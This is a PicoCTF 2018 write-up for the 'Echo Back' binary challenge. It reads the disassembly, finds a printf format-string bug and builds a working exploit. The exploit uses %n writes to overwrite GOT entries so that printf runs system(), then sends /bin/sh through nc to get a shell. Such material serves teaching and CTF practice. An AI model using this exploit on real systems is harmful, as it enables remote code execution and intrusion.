PicoCTF 2018 - Echo Back
Note: This article is part of our PicoCTF 2018 BinExp Guide.
Spot the Bug
Bad news this time around, they haven’t given us any C code, only the binary. The good news: you aught to be pretty good at reading assembly code by now, so run objdump -M intel -S echoback
and get to work.
Here’s the function preamble and setup:
vuln:
; Preamble, preserve ebp and edi, make room for 0x94 bytes on stack
push ebp
mov ebp,esp
; baseline stack = ebp - 0x98
push edi ; 4 bytes
sub esp,0x94 ; 0x94 bytes
; Hey, a stack canary!
mov eax,gs:0x14
mov DWORD PTR [ebp-0xc],eax
; Zero out 0x20 dwords (0x80 bytes) starting at ebp-0x8C
xor eax,eax
lea edx,[ebp-0x8c]
mov eax,0x0
mov ecx,0x20
mov edi,edx
rep stos DWORD PTR es:[edi],eax ; memset(buf, 0, 0x80)
Yup, that’s right. This time around we actually get to see a stack canary as emitted by the compiler. It lives in the Thread Control Block (TCB) header, which accessed relative to the GS segment register in the x86 SystemV ABI. Offset 0x14
contains a random value used for stack protection. It’s copied into a stack variable at the beginning of the function, and then verified again at the end. It’s unlikely we’ll be smashing any stacks today.
Now, we get a prompt for input:
sub esp,0xc
push 0x8048720 ; "echo input your message:"
call 8048460 <system@plt>
add esp,0x10
Ok, that’s weird. It creates a whole new process just to print a message to the screen. That’s not very efficient. However, it does mean that system()
has been linked into the binary, which means that it has an existing thunk inside the program as well as an entry in the .got.plt
table. You’ll use that to your advantage later.
Next up, we hit the actual bug:
sub esp,0x4
push 0x7f
lea eax,[ebp-0x8c] ; buf
push eax
push 0x0
call 8048410 <read@plt> ; read(0, buf, 0x7f)
add esp,0x10
sub esp,0xc
lea eax,[ebp-0x8c] ; buf
push eax
call 8048420 <printf@plt> ; printf(buf)
add esp,0x10
Did you catch it? It’s a read()
of exactly 0x7f
bytes into a buffer, followed by a call to printf
with the same buffer as the argument. Recall from echooo and authenticate that this is a format string vulnerability and is something you should absolutely not do.
What’s left?
sub esp,0xc
push 0x8048739 ; "\n"
call 8048450 <puts@plt>
add esp,0x10
sub esp,0xc
push 0x804873c ; "Thanks for sending the message!"
call 8048450 <puts@plt>
add esp,0x10
nop
; check the stack canary
mov eax,DWORD PTR [ebp-0xc]
xor eax,DWORD PTR gs:0x14
je 804863e <vuln+0x93>
call 8048430 <__stack_chk_fail@plt> ; call on fail
mov edi,DWORD PTR [ebp-0x4]
leave
ret
Two calls to puts()
with hardcoded strings, followed by a verification of the stack canary.
Strategy
Let’s put together what we know:
- There is a read of exactly
0x7f
(127) bytes - Those bytes are passed directly into
printf
, which means we can use format strings to read (and write) to memory. system()
is called by this binary, which means it has an existing thunk in theplt
segment.checksec
verifies that this binary uses Partial-RELRO, so the.got.plt
table is writeable. It is not compiled as a PIE, so the binary is loaded into a known fixed location into memory.- The only string we control is the one passed to
printf()
. The strings passed toputs
are not under our control (and are in read-only segments). - Although we can leak them, the address of variables on the stack aren’t really known to us before hand, making it hard to directly “write” into the stack using the format string vulnerability.
At the end of the day we want to call system("/bin/sh")
. To do this, we could modify the .got.plt
table so that printf
actually calls the thunk for system
(which is something we can figure out the address of). We would choose printf
because we control string passed to it, and we can even have that string start with "/bin/sh\0"
(including the null terminator). The problem is, in order to change the .got.plt
table, we need to use the printf
vulnerability to do it. We have a chicken and the egg problem: we need printf
to first override our table, but once we’ve done that, it’s too late to call printf()
again (there’s only one call to printf in the binary).
What would be really nice is if we could somehow get two calls to vuln()
to run, the first time to override the .got.plt
table so that printf
is actually system
, and the second time so that we can pass in /bin/sh
as the argument.
I’m sure by this point the wheels are turning and you’ve identified a strategy. If you think you know where this is headed, connect with nc 2018shell.picoctf.com 37402
now.
Background Info
Firstly, what stack variables are there, and where is the start of the buffer relative to the call to printf
?
Here’s what the stack should look like immediately before the printf
call (but after the arguments have been pushed):
Start | End | Content |
---|---|---|
esp | esp+3 | &buf [4 bytes] (ptr to format string) |
esp+4 | esp+15 | alignment padding [12 bytes] |
esp+16 = baseline = ebp-0x98 | esp+27 = ebp-0x8D | other [12 bytes] |
ebp-0x8C | ebp-0x0D | char buf[0x80] |
The first 4 bytes are the pointer to the buffer. The next 12 bytes are unused. After that is 12 more bytes reserved in the preamble, followed by the contents of the buffer. IE: there are 24 bytes of padding between the format string pointer and the start of the buffer contents. When represented as hypothetical 4 byte values passed as additional arguments to printf
, then there would be 6 integers values that we don’t care about, and the start of the buffer would correspond with the 7th.
What about identifying some of the useful addresses in the binary? We know there is a thunk for system()
in the ".plt"
segment of our binary, and we know the .got.plt
segment contains a writeable table containing the resolved addresses for printf
and puts
inside libc
.
$ objdump -j .plt -S echoback | grep system
08048460 <system@plt>:
$ objdump -R echoback | grep -E "printf|puts"
0804a010 R_386_JUMP_SLOT printf@GLIBC_2.0
0804a01c R_386_JUMP_SLOT puts@GLIBC_2.0
$ objdump -t echoback | grep vuln
080485ab g F .text 00000098 vuln
This means that the thunk (function) for system()
in the .plt
(code) segment of the binary is at the address 0x08048460
. The entry in the .got.plt
(data) segment corresponding with the resolved dynamic symbol for printf
is at the address 0x0804a010
, and puts
is at the address 0x0804a01c
. Finally, the address of the vuln()
function is 0x080485ab
(you’ll see why we looked this up in a second).
Exploitation
Since we know that puts
will be called after printf
, what would happen if we overrode it’s entry in the .got.plt
table to instead call vuln()
?
If we did that, then the whole function would start over again, giving us a second opportunity to pass in a string like "/bin/sh"
. To make that useful, we’d also want to overwrite the .got.plt
for printf
to point at the thunk for system
, so that it would execute /bin/sh
instead of printing it. That means we should do two separate writes into the .got.plt
table:
Address | New Value |
---|---|
0x0804a010 | 0x08048460 (134,513,760 decimal) |
0x0804a01c | 0x080485ab (134,514,091 decimal) |
The first write replaces the libc address of printf
with the thunk for system
(which is at the address 0x08048460
). The second write replaces the libc address of puts
with the address for vuln()
(0x080485ab
). From that point forward, whenever puts()
is called, vuln()
would get called instead, and likewise system()
will replace printf()
.
Before you construct your format string, recall:
- There is a POSIX extension to format strings [
%<number>$
] where you can specify a specific argument number andprintf
will index into the arguments it expects and use that specific one (NOTE: if you use it once, you have to use it for every argument). - We already know from the “Background Information” section that the first 4 bytes of the input buffer are located at the same place as a hypothetical 7th integer sized argument to the
printf
call. The next 4 bytes, by extension, are in the same place as the 8th integer argument. - We also know that there is a special format string token,
%n
, that accepts a pointer to an integer and will actually write a value to that address indicating the number of bytes printed so far. - We haven’t covered it yet, but you can specify a
width
specifier, as in"%10x"
, which specifies that the output value should be a minimum of 10 characters wide (and would add spacing as necessary to pad the output)."%010X"
would do the same, but pad the hexadecimal integer output with0
s instead of spaces. - Finally, we know the
read()
call used by the binary is expecting0x7F
bytes, which it will place into a0x80
byte buffer initialized with0
s.
Now, the format string to do the appropriate writes to the .got.plt
table:
Format String Value | Description |
---|---|
"\x10\xa0\x04\x08" | little-endian address of printf entry in .got.plt (prints 4 chars) |
"\x1c\xa0\x04\x08" | little-endian address of puts entry in .got.plt (prints 4 chars) |
"%1$0134513752x" | print arg 1 as a hex value, padded with 0’s, so that it is 134,513,752 chars wide |
"%7$n" | write the # of chars printed so far (134,513,752 + 4 + 4) into the address pointed to by the 7th argument |
"%1$0331x" | print arg1 as a hex value, padded with 0’s, so that it is 331 chars wide |
"%8$n" | write the # of chars printed so far (134,513,752 + 4 + 4 + 331) into the address pointed to by the 8th argument) |
<padding> | pad the format string out to be exactly 0x7f (127) bytes long |
The format string, without the padding, is 4 + 4 + 14 + 4 + 8 + 4 = 38 bytes, which means we should add 89 bytes of padding.
After the padding is finished, we expect the program to jump into vuln
again, and start reading a new string. This time we want the buffer to start with "/bin/sh\0"
. Let’s put all of this together and try it out:
$ (python -c 'print("\x10\xa0\x04\x08\x1c\xa0\x04\x08%1$0134513752x%7$n%1$0331x%8$n" + "U"*89 + "/bin/sh\0")'; cat -) | nc 2018shell.picoctf.com 37402
<LOTS OF OUTPUT ...>
0000000ffa4ab8cUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUinput your message:
ls
echoback
echoback.c
flag.txt
xinet_startup.sh
cat flag.txt
picoCTF{===REDACTED===}
Just as in previous examples, we spawn a sub-shell to first print out the format string, and then start cat
to echo back stdin
into stdout
. We pipe the combined output of both of these programs into the nc
command which is used to connect to the challenge binary on the shell server. When the program on the other end receives the input that we’ve generated, it will eventually call system("/bin/sh")
, at which point cat
will be listening on our end for user input and will echo it back into the nc
process, which in turn gets feed into the shell, giving us an interactive terminal. Head back to the PicoCTF 2018 BinExp Guide to continue with the next challenge.